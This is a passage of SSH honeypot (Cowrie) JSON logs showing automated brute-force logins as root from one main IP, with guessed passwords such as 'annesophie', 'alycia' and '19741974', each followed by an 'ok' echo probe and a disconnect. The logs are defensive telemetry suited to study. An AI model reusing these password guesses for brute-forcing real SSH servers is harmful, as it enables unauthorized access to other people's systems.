H client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T20:15:47.277859Z","src_ip":"212.227.125.160","session":"a682fabb1f60"}
{"eventid":"cowrie.login.success","username":"root","password":"annesophie","message":"login attempt [root/annesophie] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:15:47.352204Z","src_ip":"212.227.125.160","session":"a682fabb1f60"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:15:47.418854Z","src_ip":"212.227.125.160","session":"a682fabb1f60"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T20:15:47.419727Z","src_ip":"212.227.125.160","session":"a682fabb1f60"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:15:47.443846Z","src_ip":"212.227.125.160","session":"a682fabb1f60"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:15:47.445135Z","src_ip":"212.227.125.160","session":"a682fabb1f60"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38744,"dst_ip":"1.2.3.4","dst_port":22,"session":"db1ed58a3171","protocol":"ssh","message":"New connection: 212.227.125.160:38744 (1.2.3.4:22) [session: db1ed58a3171]","sensor":"my-vps","timestamp":"2025-08-26T20:15:47.465703Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:15:47.466581Z","src_ip":"212.227.125.160","session":"db1ed58a3171"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T20:15:47.489459Z","src_ip":"212.227.125.160","session":"db1ed58a3171"}
{"eventid":"cowrie.login.success","username":"root","password":"alycia","message":"login attempt [root/alycia] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:15:47.561382Z","src_ip":"212.227.125.160","session":"db1ed58a3171"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:15:47.686255Z","src_ip":"212.227.125.160","session":"db1ed58a3171"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T20:15:47.687092Z","src_ip":"212.227.125.160","session":"db1ed58a3171"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:15:47.711043Z","src_ip":"212.227.125.160","session":"db1ed58a3171"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:15:47.713370Z","src_ip":"212.227.125.160","session":"db1ed58a3171"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38750,"dst_ip":"1.2.3.4","dst_port":22,"session":"f21d0102da9b","protocol":"ssh","message":"New connection: 212.227.125.160:38750 (1.2.3.4:22) [session: f21d0102da9b]","sensor":"my-vps","timestamp":"2025-08-26T20:15:52.886702Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:15:52.887774Z","src_ip":"212.227.125.160","session":"f21d0102da9b"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T20:15:52.910508Z","src_ip":"212.227.125.160","session":"f21d0102da9b"}
{"eventid":"cowrie.login.success","username":"root","password":"WXCVBN","message":"login attempt [root/WXCVBN] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:15:52.986105Z","src_ip":"212.227.125.160","session":"f21d0102da9b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:15:53.092106Z","src_ip":"212.227.125.160","session":"f21d0102da9b"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T20:15:53.092921Z","src_ip":"212.227.125.160","session":"f21d0102da9b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:15:53.119822Z","src_ip":"212.227.125.160","session":"f21d0102da9b"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:15:53.121016Z","src_ip":"212.227.125.160","session":"f21d0102da9b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51746,"dst_ip":"1.2.3.4","dst_port":22,"session":"71fc8797af4c","protocol":"ssh","message":"New connection: 212.227.125.160:51746 (1.2.3.4:22) [session: 71fc8797af4c]","sensor":"my-vps","timestamp":"2025-08-26T20:15:53.141539Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:15:53.151475Z","src_ip":"212.227.125.160","session":"71fc8797af4c"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T20:15:53.173551Z","src_ip":"212.227.125.160","session":"71fc8797af4c"}
{"eventid":"cowrie.login.success","username":"root","password":"9999999991","message":"login attempt [root/9999999991] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:15:53.280988Z","src_ip":"212.227.125.160","session":"71fc8797af4c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:15:53.345044Z","src_ip":"212.227.125.160","session":"71fc8797af4c"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T20:15:53.345816Z","src_ip":"212.227.125.160","session":"71fc8797af4c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:15:53.377006Z","src_ip":"212.227.125.160","session":"71fc8797af4c"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:15:53.378393Z","src_ip":"212.227.125.160","session":"71fc8797af4c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51754,"dst_ip":"1.2.3.4","dst_port":22,"session":"1926dba74c47","protocol":"ssh","message":"New connection: 212.227.125.160:51754 (1.2.3.4:22) [session: 1926dba74c47]","sensor":"my-vps","timestamp":"2025-08-26T20:15:54.422635Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:15:54.423708Z","src_ip":"212.227.125.160","session":"1926dba74c47"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T20:15:54.446025Z","src_ip":"212.227.125.160","session":"1926dba74c47"}
{"eventid":"cowrie.login.success","username":"root","password":"19741974","message":"login attempt [root/19741974] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:15:54.517663Z","src_ip":"212.227.125.160","session":"1926dba74c47"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:15:54.634595Z","src_ip":"212.227.125.160","session":"1926dba74c47"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T20:15:54.635483Z","src_ip":"212.227.125.160","session":"1926dba74c47"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:15:54.659089Z","src_ip":"212.227.125.160","session":"1926dba74c47"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:15:54.660300Z","src_ip":"212.227.125.160","session":"1926dba74c47"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51760,"dst_ip":"1.2.3.4","dst_port":22,"session":"5cdc0c4e2c75","protocol":"ssh","message":"New connection: 212.227.125.160:51760 (1.2.3.4:22) [session: 5cdc0c4e2c75]","sensor":"my-vps","timestamp":"2025-08-26T20:15:59.798893Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:15:59.952773Z","src_ip":"212.227.125.160","session":"5cdc0c4e2c75"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T20:15:59.974907Z","src_ip":"212.227.125.160","session":"5cdc0c4e2c75"}
{"eventid":"cowrie.login.success","username":"root","password":"1957","message":"login attempt [root/1957] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:16:00.631607Z","src_ip":"212.227.125.160","session":"5cdc0c4e2c75"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:16:00.966928Z","src_ip":"212.227.125.160","session":"5cdc0c4e2c75"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T20:16:00.967670Z","src_ip":"212.227.125.160","session":"5cdc0c4e2c75"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:16:01.121444Z","src_ip":"212.227.125.160","session":"5cdc0c4e2c75"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:16:01.122740Z","src_ip":"212.227.125.160","session":"5cdc0c4e2c75"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":42816,"dst_ip":"1.2.3.4","dst_port":22,"session":"c94df08b7e9c","protocol":"ssh","message":"New connection: 217.154.1.158:42816 (1.2.3.4:22) [session: c94df08b7e9c]","sensor":"my-vps","timestamp":"2025-08-26T20:16:02.274316Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:16:02.275337Z","src_ip":"217.154.1.158","session":"c94df08b7e9c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:16:02.289853Z","src_ip":"217.154.1.158","session":"c94df08b7e9c"}
{"eventid":"cowrie.login.failed","username":"oscar","password":"123456","message":"login attempt [oscar/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T20:16:02.341807Z","src_ip":"217.154.1.158","session":"c94df08b7e9c"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:16:03.358637Z","src_ip":"217.154.1.158","session":"c94df08b7e9c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55916,"dst_ip":"1.2.3.4","dst_port":22,"session":"ebef0f0f2223","protocol":"ssh","message":"New connection: 212.227.125.160:55916 (1.2.3.4:22) [session: ebef0f0f2223]","sensor":"my-vps","timestamp":"2025-08-26T20:16:12.342916Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:16:12.343755Z","src_ip":"212.227.125.160","session":"ebef0f0f2223"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T20:16:12.366396Z","src_ip":"212.227.125.160","session":"ebef0f0f2223"}
{"eventid":"cowrie.login.success","username":"root","password":"vivi","message":"login attempt [root/vivi] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:16:12.449510Z","src_ip":"212.227.125.160","session":"ebef0f0f2223"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:16:12.516331Z","src_ip":"212.227.125.160","session":"ebef0f0f2223"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T20:16:12.517219Z","src_ip":"212.227.125.160","session":"ebef0f0f2223"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:16:12.540926Z","src_ip":"212.227.125.160","session":"ebef0f0f2223"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:16:12.542122Z","src_ip":"212.227.125.160","session":"ebef0f0f2223"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36852,"dst_ip":"1.2.3.4","dst_port":22,"session":"6971661effce","protocol":"ssh","message":"New connection: 212.227.125.160:36852 (1.2.3.4:22) [session: 6971661effce]","sensor":"my-vps","timestamp":"2025-08-26T20:16:12.563016Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:16:12.563967Z","src_ip":"212.227.125.160","session":"6971661effce"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T20:16:12.586298Z","src_ip":"212.227.125.160","session":"6971661effce"}
{"eventid":"cowrie.login.success","username":"root","password":"valery","message":"login attempt [root/valery] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:16:12.658794Z","src_ip":"212.227.125.160","session":"6971661effce"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:16:12.781361Z","src_ip":"212.227.125.160","session":"6971661effce"}
